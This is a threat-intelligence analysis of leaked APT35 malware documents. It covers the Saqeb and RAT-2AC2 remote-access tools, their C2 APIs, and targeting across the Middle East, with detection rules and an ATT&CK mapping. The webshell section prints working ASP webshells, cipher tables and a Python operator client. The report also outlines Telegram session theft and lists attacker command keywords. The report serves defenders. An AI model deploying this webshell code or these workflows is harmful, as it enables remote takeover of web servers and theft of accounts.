Executive Summary

Episode 3 documents reveal APT35/Charming Kitten's complete malware development pipeline, including two distinct RAT families (Saqeb System and RAT-2AC2), custom webshells, training materials, and operational testing procedures. This collection represents a professional malware development operation with dedicated quality assurance, anti-detection research, and modular architecture designed for long-term persistence in Windows environments.

These documents expose the entire malware development lifecycle, from reverse engineering training materials to production deployment, including FUD testing procedures, module specifications, and operational webshell infrastructure.

Analysis 

Key Findings Summary

1. Malware Arsenal:

  • Saqeb System: Professional Windows RAT with 5 modules, FUD-focused, multi-hop C2 via TOR
  • RAT-2AC2: .NET-based RAT with Flask backend, VNC capability, masquerading as legitimate services
  • Webshells: Custom m0s.asp variants using Accept-Language header covert channel and substitution cipher
  • Support Tools: Encryptor V1, phishing kits (Google Drive lures), training materials

2. Operational Scale:

  • 300+ compromised entities (stated by APT35)
  • 6+ countries targeted (UAE, Jordan, Turkey, Israel, Egypt, Saudi Arabia)
  • Multiple confirmed breaches: FlyDubai, Dubai Police, Jordan Desert Tourism, Eposta, plus all Episode 1-2 victims
  • Long-term operations: 2022-2025 documented activity

3. Sophistication Level:

  • Advanced development: Native code (C/C++), modular architecture, professional QA/testing
  • Anti-detection focus: FUD lab, systematic AV evasion, anti-debug/anti-VM, string obfuscation
  • Operational security: Multi-hop C2, TOR integration, relay servers, traffic encryption
  • Quality documentation: Complete manuals, training curricula, operational reports

4. Strategic Objectives:

  • Regional intelligence: Airport/hotel databases, law enforcement, SCADA systems
  • Anti-Israel operations: Moses' Staff ransomware group, 300+ sites prepped for attacks
  • Influence campaigns: Black Flags, Zion 24, "Israel, The Fragile Mirror"
  • Axis of Resistance support: CCTV sharing, intelligence coordination, regional alliance

Malware Family Analysis

A. Saqeb System - Primary Windows RAT

Overview

  • Name: Saqeb System (ساماه ثاقب)
  • Organization: Ofogh Media Institute (موسسه رسانه ای افق)
  • Classification: Advanced Windows RAT with modular architecture
  • Target Platform: Windows (all versions)
  • Development Language: C++ (Native code - non-.NET dependent)
  • Architecture: Two-part system (Agent + Command Panel)

Agent Specifications:

  • Programming Language: C++ (Native)
  • Compilation: Visual Studio 2015
  • Runtime: Multi-threaded (/MT flag)
  • Dependencies: Framework-independent (native code)
  • Anti-Detection: FUD-focused design
  • Communication: HTTP/HTTPS with XOR encryption

Modular Structure (5 Components):

Command & Control Panel

Panel Technology Stack:

  • Platform: Web-based (TOR hidden service)
  • Backend: Not specified (likely PHP/Python)
  • Access: Username/password + CAPTCHA
  • Communication: HTTP over TOR
  • Default Interval: 20 seconds (configurable)

Panel Capabilities:

| Feature | Description | Technical Implementation |
|---|---|---|
| Client Management | View online/offline clients | Real-time status polling |
| File Explorer | Browse/download/upload files | Access-level dependent |
| Command Execution | Windows CMD commands | Real-time result return |
| Screenshot Capture | Desktop image retrieval | GDI-based capture |
| Keylogger Control | Start/stop key logging | Disk-based encrypted storage |
| Stealer Modules | Firefox/Telegram extraction | On-demand module delivery |
| Auto-Run Scheduling | Daily/weekly persistence | Configurable execution times |
| Remote Update | Agent version updates | central.dat replacement |
| Self-Destruct | Complete removal | "Kill RAT" function |

Panel UI Features (from manual):

- Add New Client: Creates unique password-protected ZIP agent

- Serial Number: Unique identifier per agent (e.g., 337E81E3BA4B)

- Status: Online/Offline/STOP states

- Interval Slider: Adjust callback frequency (seconds)

- History Logs: Command execution tracking with timestamps

- User Management: Multi-user access control

- Lock Screen: Panel security feature

- CSV Export: Command results extraction

Execution Flow:

1. Download lock.dat from server (hex-encoded)

2. Decode to rns.dll

3. Create BAT file with rundll32 command

4. Execute BAT → rundll32 loads rns.dll

5. Call snrProc() function

6. Random byte destruction on accessible files

Session Hijacking Workflow:

1. Search disk for Telegram folder

2. Locate session files

3. Base64 encode all files

4. Transmit to C2

5. Attacker replaces files on new system

6. Gain Telegram access (if no Cloud Password)

B. RAT-2AC2 - Secondary RAT Platform

Overview

  • Development: C# language + .NET Framework 4
  • Server: Python + Flask Version 2
  • Protocol: HTTP/HTTPS
  • Architecture: Client-Server with API-based registration
  • Infrastructure: Supports DNS forwarding and multiple relays

Technical Specifications

Client (Agent):

  • Language: C#
  • Framework: .NET 4.0 (Managed code)
  • Platform: Windows
  • Communication: HTTP REST API
  • Authentication: Header-based token
  • Status Reporting: Every 5 seconds
  • Initial Command: systeminfo execution

Server (Panel):

  • Language: Python 3.x
  • Framework: Flask 2.x
  • OS Recommendation: Linux Debian
  • Installation: pip3 install -r requirement.txt
  • Execution: python3 app.py
  • Configuration: Final line of app.py (address/port)

API Endpoints

| Endpoint | Method | Function | Parameters |
|---|---|---|---|
| /api | POST | Initial client registration | IP, OS, CPU, RAM, AV, .NET, DOMAIN, POWERSHELL, USERNAME, PYTHON_VERSION, COUNTRY |
| /cmd/<id> | GET | Retrieve commands for client | Client ID |
| /panel | GET | Web panel access | Requires header token + login |
| /login | POST | Authentication | Username, Password |
| /keylogger | POST | Keylogger results | Client ID, logged data |
| /vncLauncher | POST | Initialize VNC | Triggers bore/noVNC setup |
| /vncConnect | GET | Connect to VNC | Opens browser connection |
| /vncTerminate | POST | Stop VNC | Kills novncproxy/bore |
| /file | POST | File upload to server | File data |
| /command | POST | Register command | Client ID, command string |
| /result | POST | Command result | Client ID, result data |
| /log | GET | Command history | All logged commands |
| /download | GET | Download file from client | Path parameter |
| /delete | POST | Delete client | Client ID |
| /SysInfo | POST | System information | Full systeminfo output |
| /uploadInDatabase | POST | Upload file to client | File + path |

Security Implementation

Authentication Flow:

1. Client sends API request with header token

2. Server validates token

3. If valid, assigns unique ID

4. Client uses ID for all subsequent requests

5. Commands retrieved via /cmd/<id>

Capabilities

Remote Access:

  • VNC: Browser-based via noVNC + bore.pub tunneling
  • Command Execution: Windows CMD shell
  • Keylogging: Background keyboard capture with file storage
  • Screenshot: Desktop image capture
  • File Management: Upload/download with path specification

VNC Architecture:

1. Client downloads bore software

2. Sets up noVNC server

3. Executes port forward via bore

4. Sends bore.pub address + port to server

5. Operator connects via browser

6. Terminate via vncTerminate (kills all services)

File Operations:

Download from Client:

1. Command: DOWNLOAD=/path/to/file

2. Client reads file → Base64 encode → Send to server

3. Server stores file → Displays in panel

4. Access level dependent on client privileges

Upload to Client:

1. Upload file to server via /file

2. Register command: UPLOAD=/path/to/file/filename.ext

3. Client downloads from server

4. Client writes file to specified path

Keylogger Workflow:

1. Server sends "keylogger" command

2. Panel button turns red (waiting)

3. Client starts logging to disk file

4. Results sent periodically to server

5. Panel button turns blue (data received)

6. Click button to view results

Webshell Infrastructure

A. m0s.asp - Advanced ASP Webshell

Overview

  • Language: Classic ASP (VBScript)
  • Method: HTTP Header-based command channel
  • Encoding: Custom substitution cipher
  • Execution: WScript.Shell command execution

Technical Implementation

Command Channel:

```asp
' Read the Accept-Language header that carries the encoded command
cmdEncoded = Request.ServerVariables("HTTP_ACCEPT_LANGUAGE")

' Decode via the custom substitution cipher (DE -> EN tables below)
cmdDecoded = DecodeFunction(cmdEncoded)

' Execute the decoded command through WScript.Shell
Set objShell = Server.CreateObject("WScript.Shell")
Set objExec = objShell.Exec("cmd /c " & cmdDecoded)

' Return STDOUT to the requester
Response.Write objExec.StdOut.ReadAll()
```

Substitution Cipher:

Encoding Table (EN):

AB_CDEFG.HIJKLM!$%&*()?NOPQR-STUVWXYZabcdefghijklmnopqrstu=vwxyz0123456789/

Decoding Table (DE):

Qk3\afcPbYJTGywSv=0Egdx62X-NRVz!~$%_*()?Uq7os1ijFMuLOetCl98K5nBrn4.prWAHmIZ

Decode Function Logic:

  • For each character in the encoded string:
    • Find its position in the DE table
    • Replace it with the character at the same position in the EN table
    • Append the result to the decoded string
  • Return the decoded command

Operational Use

Client Scripts (Python):

```python
# connect.py, RCE4.py, rce5.py pattern
import requests

# Hardcoded target URLs (examples from artifacts)
targets = [
    "https://<domain>/images/flash/test9/m0s.phto",
    "http://<IP>/images/m0s.php",
    "http://<domain>/CMS/Uploads/m0s.aspx"
]
target_url = targets[0]  # one of the hardcoded targets is selected

# Encoding function (mirrors the ASP decoder: EN -> DE)
def encode_command(cmd):
    en = "AB_CDEFG.HIJKLM!$%&*()?NOPQR-STUVWXYZabcdefghijklmnopqrstu=vwxyz0123456789/"
    de = "Qk3\\afcPbYJTGywSv=0Egdx62X-NRVz!~$%_*()?Uq7os1ijFMuLOetCl98K5nBrn4.prWAHmIZ"
    trans = str.maketrans(en, de)
    return cmd.translate(trans)

# Interactive loop: each command travels in the Accept-Language header
while True:
    cmd = input("CMD> ")
    encoded = encode_command(cmd)

    headers = {
        "Accept-Language": encoded,
        "Accept-Captcha": "[predefined value]",
        "User-Agent": "Mozilla/5.0..."
    }

    response = requests.get(target_url, headers=headers)
    print(response.text)
```

B. file.asp / webshell.asp - Simpler Variants

Implementation

```asp
<%
' Direct command execution (no encoding)
cmd = Request.ServerVariables("HTTP_ACCEPT_LANGUAGE")
Set objShell = Server.CreateObject("WScript.Shell")
Set objExec = objShell.Exec("cmd /c " & cmd)
Response.Write objExec.StdOut.ReadAll()
%>
```

Aim: Full RCE with IIS worker process privileges, no authentication, direct header-to-shell execution.

3. Target Intelligence

A. Targeting Pattern Analysis

Geographic Focus:

  • Primary: UAE (2 confirmed: FlyDubai, Dubai Police)
  • Secondary: Jordan (1 confirmed: Tourism sector)
  • Tertiary: Turkey (1 confirmed: Email provider)
  • Active: Israel (folder structure confirms)
  • Active: Egypt (folder structure confirms)

Sector Targeting:

  • Aviation: FlyDubai
  • Law Enforcement: Dubai Police
  • Tourism: Jordan Desert
  • Communications: Eposta

Strategic Pattern:

  • Critical Infrastructure: Aviation sector
  • Intelligence Goldmine: Law enforcement systems
  • Economic Intelligence: Tourism (visitor tracking)
  • Communications Surveillance: Email providers

B. SCADA/Industrial Targeting (from #78TPDD report)

Stated Capabilities:

  • "Establishing access to industrial infrastructures and extracting SCADA domain information for utilization in offensive cyber operations"

Implications:

  • Active SCADA reconnaissance ongoing
  • Information collection for future attacks
  • Offensive capability development
  • Critical infrastructure targeting

Potential Targets (based on regional focus):

  • Oil & gas facilities (UAE, Saudi Arabia)
  • Water treatment plants (mentioned: National Water Company access in Episode 2)
  • Power generation/distribution
  • Desalination plants (critical UAE infrastructure)
  • Airport systems (FlyDubai access point)

C. Ransomware Scale (from #78TPDD report)

Stated Achievement:

  • "Establishing access on over 300 sites and companies for ransomware attacks in line with media exploitation"

Analysis:

  • 300+ compromised entities: Massive access inventory
  • Ransomware ready: Pre-positioned for deployment
  • Media weaponization: Attacks timed for psychological impact
  • Moses' Staff group: Public attribution for operations

Moses' Staff Operations:

  • Tactics: Ransomware + data leaks
  • Target: "Zionist regime" (Israel)
  • Media Strategy: Global news network coverage
  • Purpose: "Breaking hollow dominance in cyber capability"

4. Detection & Prevention Guidance

Behavioral Detection

Saqeb Behavioral Pattern:

Triggers:

1. Process creates mutex via CreateEventA()

2. AND loads library from .dat file (LoadLibrary on non-PE extension)

3. AND makes HTTPS connections with XOR-encrypted payloads

4. AND exhibits one of:

   - Keyboard hooking (SetWindowsHookEx WH_KEYBOARD_LL)

   - File enumeration at disk root level

   - Multiple small network transmissions with delays

   - Firefox profile directory access (logins.json)

   - Telegram folder access (D877F783D5D3EF8Cs)

Severity: CRITICAL

Response: Isolate, collect memory dump, alert SOC

RAT-2AC2 Behavioral Pattern:

Rule: APT35_RAT2AC2_Behavior

Triggers:

1. .NET executable with service-like name runs from non-standard location

2. AND makes HTTP POST to /api endpoint with system enumeration data

3. AND polls /cmd/<id> endpoint every 5-10 seconds

4. AND exhibits one of:

   - Downloads bore.pub software

   - Starts noVNC service

   - Executes systeminfo command

   - Creates files in Base64 format

   - Port forwarding activity

Severity: CRITICAL

Response: Kill process, block C2 IPs, forensic investigation
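The polling signature in the RAT-2AC2 rule above can be checked mechanically. The following Python is an added example (not code from the leaked documents or from CloudSEK) that scans constructed proxy-log records in an assumed "epoch src method path" format for a POST /api registration followed by steady GET /cmd/<id> polling; the thresholds and sample IPs are assumptions.

```python
"""Flag RAT-2AC2-style beaconing in web-proxy logs (added example,
not code from the leaked documents or CloudSEK). Assumes a constructed
"epoch_seconds src_ip method path" log format; the signal, per the
rule above, is POST /api then steady GET /cmd/<id> polling."""
import re
import statistics
from collections import defaultdict

# Constructed sample: 10.0.0.5 registers then polls every 5 s;
# 10.0.0.9 is a normal user who hits a /cmd/ path twice, irregularly.
SAMPLE_LOG = """\
1700000000 10.0.0.5 POST /api
1700000005 10.0.0.5 GET /cmd/17
1700000010 10.0.0.5 GET /cmd/17
1700000015 10.0.0.5 GET /cmd/17
1700000020 10.0.0.5 GET /cmd/17
1700000025 10.0.0.5 GET /cmd/17
1700000003 10.0.0.9 GET /cmd/help
1700000090 10.0.0.9 GET /cmd/help
"""

LINE_RE = re.compile(r"^(\d+) (\S+) (GET|POST) (\S+)$")
CMD_RE = re.compile(r"^/cmd/[^/]+$")

def parse_log(text):
    """Yield (ts, src, method, path); malformed lines are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield int(m.group(1)), m.group(2), m.group(3), m.group(4)

def find_beacons(text, min_polls=4, min_period=3.0, max_period=12.0,
                 max_jitter=1.0):
    """Return {src: {"registered", "period", "polls"}} for hosts whose
    /cmd/<id> polling is regular enough to look like an agent loop.
    Thresholds are assumptions tuned to the 5-10 s cadence in the rule."""
    registered = set()
    polls = defaultdict(list)
    for ts, src, method, path in parse_log(text):
        if method == "POST" and path == "/api":
            registered.add(src)
        elif method == "GET" and CMD_RE.match(path):
            polls[src].append(ts)
    hits = {}
    for src, times in polls.items():
        times.sort()
        if len(times) < min_polls:
            continue  # too few requests to judge cadence
        gaps = [b - a for a, b in zip(times, times[1:])]
        period, jitter = statistics.mean(gaps), statistics.pstdev(gaps)
        if min_period <= period <= max_period and jitter <= max_jitter:
            hits[src] = {"registered": src in registered,
                         "period": period, "polls": len(times)}
    return hits

if __name__ == "__main__":
    for src, info in find_beacons(SAMPLE_LOG).items():
        print(f"{src}: polls every {info['period']} s, "
              f"registered={info['registered']}")
```

A host that polls regularly without a preceding /api registration is still reported, with registered=False, since the registration may have happened before the log window.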

Webshell Behavioral Pattern:

Rule: APT35_Webshell_Behavior

Triggers:

1. IIS worker process (w3wp.exe)

2. AND spawns cmd.exe or powershell.exe

3. AND command includes suspicious keywords:

   - whoami, net user, net localgroup

   - ipconfig, netstat, tasklist

   - dir C:\, type [file]

   - WMIC, NET USE (lateral movement)

4. AND HTTP request contained unusual Accept-Language header

Severity: HIGH

Response: Block source IP, kill web process, check for persistent webshells

5. MITRE ATT&CK Mapping

Adversary techniques & evidence mapping
| Tactic | Technique | Sub-Technique | Evidence | Malware |
|---|---|---|---|---|
| Initial Access | T1566 - Phishing | T1566.001 - Spearphishing Attachment | Google Drive phishing kit with .rar files | All campaigns |
| Initial Access | T1190 - Exploit Public-Facing Application | | Webshell deployment on web servers | m0s.asp variants |
| Execution | T1059 - Command and Scripting Interpreter | T1059.001 - PowerShell | Webshell cmd execution | m0s.asp, RAT-2AC2 |
| Execution | | T1059.003 - Windows Command Shell | cmd /c execution via WScript.Shell | m0s.asp, file.asp |
| Execution | T1204 - User Execution | T1204.002 - Malicious File | Phishing attachments, malware executables | Saqeb, RAT-2AC2 |
| Execution | T1106 - Native API | | CreateEventA, LoadLibrary, GetProcAddress | Saqeb main |
| Persistence | T1543 - Create or Modify System Process | T1543.003 - Windows Service | Service masquerading (WinUpdateService.exe, etc.) | RAT-2AC2 |
| Persistence | T1547 - Boot or Logon Autostart Execution | T1547.001 - Registry Run Keys | Auto-run scheduling (daily/weekly) | Saqeb |
| Persistence | T1505 - Server Software Component | T1505.003 - Web Shell | m0s.asp, file.asp, webshell.asp deployed | Webshells |
| Privilege Escalation | T1543 - Create or Modify System Process | T1543.003 - Windows Service | Elevated service creation | RAT-2AC2 |
| Defense Evasion | T1027 - Obfuscated Files or Information | T1027.002 - Software Packing | Hex encoding of modules (bin2hex.py) | Saqeb modules |
| Defense Evasion | | T1027.007 - Dynamic API Resolution | LoadLibrary + GetProcAddress at runtime | Saqeb main |
| Defense Evasion | T1140 - Deobfuscate/Decode Files or Information | | Runtime hex decoding, XOR decryption, string deobfuscation | Saqeb, webshells |
| Defense Evasion | T1036 - Masquerading | T1036.004 - Masquerade Task or Service | Legitimate service names (Microsoft, Exchange, Windows) | RAT-2AC2 |
| Defense Evasion | | T1036.008 - Masquerade File Type | .dat extensions for DLLs | Saqeb modules |
| Defense Evasion | T1070 - Indicator Removal | T1070.004 - File Deletion | Self-destruct capability ("Kill RAT") | Saqeb |
| Defense Evasion | T1112 - Modify Registry | | Registry manipulation for persistence (minimal to avoid detection) | Saqeb |
| Defense Evasion | T1497 - Virtualization/Sandbox Evasion | | Anti-VM techniques (training curriculum Section 8) | All malware |
| Defense Evasion | T1622 - Debugger Evasion | | Anti-debug mechanisms | Saqeb (documented in manual) |
| Defense Evasion | T1562 - Impair Defenses | T1562.001 - Disable or Modify Tools | AV exclusion paths in file destruction module | rns.dll |
| Credential Access | T1555 - Credentials from Password Stores | T1555.003 - Credentials from Web Browsers | Firefox password extraction (nss3.dll abuse) | stler.dll (creds.dat) |
| Credential Access | T1552 - Unsecured Credentials | T1552.001 - Credentials In Files | Telegram session file theft | telg.dll (msg.dat) |
| Credential Access | T1056 - Input Capture | T1056.001 - Keylogging | SetWindowsHookEx keyboard hooking | klg.dll (logging.dat) |
| Discovery | T1082 - System Information Discovery | | systeminfo command execution | RAT-2AC2, webshells |
| Discovery | T1083 - File and Directory Discovery | | Disk-level file enumeration (Fexp function) | Saqeb main |
| Discovery | T1057 - Process Discovery | | Process enumeration capabilities | All RATs |
| Discovery | T1033 - System Owner/User Discovery | | whoami, username collection | All malware |
| Discovery | T1016 - System Network Configuration Discovery | | ipconfig, network enumeration | Webshells, RATs |
| Discovery | T1049 - System Network Connections Discovery | | netstat commands | Webshells |
| Discovery | T1518 - Software Discovery | T1518.001 - Security Software Discovery | AV detection (Kaspersky, BitDefender exclusions) | Saqeb, RAT-2AC2 |
| Lateral Movement | T1021 - Remote Services | T1021.006 - Windows Remote Management | WMIC commands in webshell scripts | RCE4.py comments |
| Lateral Movement | T1080 - Taint Shared Content | | File upload to UNC shares | Webshell comments (vmware-tools.exe example), connect.py |
| Collection | T1005 - Data from Local System | | File download capabilities, Firefox/Telegram data extraction | Saqeb, RAT-2AC2 |
| Collection | T1113 - Screen Capture | | Screenshot functionality (capHandler) | Saqeb, RAT-2AC2 |
| Collection | T1119 - Automated Collection | | Automated file enumeration and exfiltration | Saqeb |
| Collection | T1056 - Input Capture | T1056.001 - Keylogging | Keyboard hook with window title logging | klg.dll |
| Command & Control | T1071 - Application Layer Protocol | T1071.001 - Web Protocols | HTTP/HTTPS C2 communication | All malware |
| Command & Control | T1132 - Data Encoding | T1132.001 - Standard Encoding | XOR encryption, Base64, hex encoding, substitution cipher | All malware |
| Command & Control | T1573 - Encrypted Channel | T1573.001 - Symmetric Cryptography | XOR-based traffic encryption | Saqeb |
| Command & Control | T1090 - Proxy | T1090.003 - Multi-hop Proxy | Relay servers + TOR (7 hops) | Saqeb |
| Command & Control | T1095 - Non-Application Layer Protocol | | TOR network usage (.onion addresses) | Saqeb |
| Command & Control | T1571 - Non-Standard Port | | Webshells on ports 9003, various custom ports | Episodes 1-2 evidence |
| Command & Control | T1001 - Data Obfuscation | T1001.002 - Steganography | Covert channel via Accept-Language header | m0s.asp variants |
| Command & Control | T1105 - Ingress Tool Transfer | | Module download from C2 (dwPlugin function) | Saqeb |
| Exfiltration | T1041 - Exfiltration Over C2 Channel | | Data exfiltration via HTTP POST | All malware |
| Exfiltration | T1020 - Automated Exfiltration | | Scheduled data collection and transmission | Saqeb |
| Exfiltration | T1030 - Data Transfer Size Limits | | Chunked file transfer (flwHandler) | Saqeb |
| Impact | T1486 - Data Encrypted for Impact | | Ransomware encryption routine observed in payloads | Saqeb-ransom variant |

References

https://github.com/KittenBusters/CharmingKitten

Koushik Pal
Threat Researcher at CloudSEK, specializing in digital forensics, incident response, and adversary hunting to uncover attacker motives, methods, and operations.
